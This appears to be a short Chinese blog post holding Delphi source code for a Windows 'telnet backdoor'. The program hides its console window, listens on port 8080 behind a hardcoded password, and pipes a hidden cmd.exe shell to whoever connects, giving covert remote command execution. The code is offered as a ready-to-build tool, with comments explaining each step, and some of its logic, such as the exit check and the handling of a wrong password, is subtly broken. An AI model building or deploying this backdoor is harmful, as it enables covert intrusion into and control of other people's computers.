winsock 实现telnet后门

2018-10-30

program Project1;
{$APPTYPE CONSOLE}
uses
SysUtils,
windows,
winsock;

var
wsadata:TWSADATA;
wversion:WORD;
buff:array[0..4096] of char;
hy,getpass,error,ok,quit:array[0..50] of char;
password:string;
port:integer;
bindserver,getclient:integer;
addrserver:sockaddr_in;
addrclient:PSOCKADDR;
namelen:PInteger;
timeout:pchar;
hreadpipe1,hwritepipe1,hreadpipe2,hwritepipe2:THandle;
sa:SECURITY_ATTRIBUTES;
siinfo:STARTUPINFO;
processinformation:PROCESS_INFORMATION;
cchReadBuffer:DWORD;
ret:integer;
ph:PChar;
cmdpath:PChar;
S:char;
n:integer;
cmd:array[0..1024] of char;
win:longint;
begin
win:=getforegroundwindow; //获取当前窗体的句柄
showwindow(win,SW_HIDE); //隐藏窗体
port:=8080; //访问端口
password:='ade'; //访问密码
timeout:=pchar(50000);
hy:='Welcome to hear.........'#10#13;
quit:=#10#13'Telnet 8080 Close.........'#10#13;
getpass:='Input You PassWord:';
error:=#13'You Input PassWord is ERROR!';
ok:=#10#13'You Input PassWord is OK!';

wversion:=MAKEWORD(2,2);
WSASTARTUP(wversion,wsadata);
ph:=AllocMem(5000);
cmdpath:=allocmem(255);
bindserver:=socket(AF_INET,SOCK_STREAM,0);
addrserver.sin_family:=AF_INET;
addrserver.sin_port:=htons(port);
addrserver.sin_addr.S_addr:=INADDR_ANY;
setsockopt(bindserver,SOL_SOCKET,SO_RCVTIMEO,timeout,sizeof(timeout)); //设置超时时间
bind(bindserver,addrserver,sizeof(addrserver)); //绑定
listen(bindserver,5); //监听
{writeln('Listen .......... OK!'); }
new(addrclient);
new(namelen);
namelen^:=sizeof(addrclient^);
getclient:=accept(bindserver,addrclient,namelen);
setsockopt(bindserver,SOL_SOCKET,SO_RCVTIMEO,timeout,sizeof(timeout)); //设置超时时间
send(getclient,hy,strlen(hy),0); //发送欢迎信息
send(getclient,getpass,strlen(getpass),0);//发送输入访问密码信息
recv(getclient,buff,1024,0);//获取输入的密码到pass缓存中
if buff<>password then //如果输入的密码不正确则退出连接返回出错信息
begin
send(getclient,error,strlen(error),0);
closesocket(getclient);
end
else //输入的密码正确可以连接
send(getclient,ok,strlen(ok),0);
sa.nLength:=sizeof(SECURITY_ATTRIBUTES);
sa.lpSecurityDescriptor:=nil;
sa.bInheritHandle:=TRUE;
createpipe(hreadpipe1,hwritepipe1,@sa,0); //创建两个匿名管道
createpipe(hreadpipe2,hwritepipe2,@sa,0);
fillchar(siinfo,sizeof(STARTUPINFO),0);
siinfo.dwFlags:=(STARTF_USESTDHANDLES or STARTF_USESHOWWINDOW);
siinfo.wShowWindow:=SW_HIDE;
siinfo.hStdInput:=hreadpipe2;
siinfo.hStdOutput:=hwritepipe1;
siinfo.hStdError:=hwritepipe1;
StrPCopy(cmdpath,'c:\windows\system32\cmd.exe'); //这里需要上面的dos可执行文件位置
CreateProcess(nil,cmdpath,nil,nil,true,0,nil,nil,siinfo,processinformation);//创建一个新进程(比如执行一个程序)

while true do
begin
if not PeekNamedPipe(hreadpipe1,ph,1,@cchReadBuffer,nil,nil) then break; //检查管道是否有数据返回
if cchReadBuffer<>0 then
begin
ReadFile(hReadPipe1,buff,1024,cchReadBuffer,nil); //从管道 hreadpipe1 读取数据
send(getclient,buff,cchReadBuffer,0); //把从管道 hreadpipe1 读取的数据写入 getclient
end
else
begin
n:=recv(getclient,cmd,1024,0);
writefile(hwritepipe2,cmd,n,cchReadBuffer,nil);
writeln(n);
if cmd[0]='exit' then
begin
send(getclient,quit,strlen(quit),0);
WSACleanup();
closesocket(getclient);
closesocket(bindserver);
CloseHandle(hreadpipe1);
CloseHandle(hreadpipe2);
closehandle(hwritepipe1);
closehandle(hwritepipe2);
{writeln('Listen .......... no!');}
break;
end
end
end;

end.

阅读27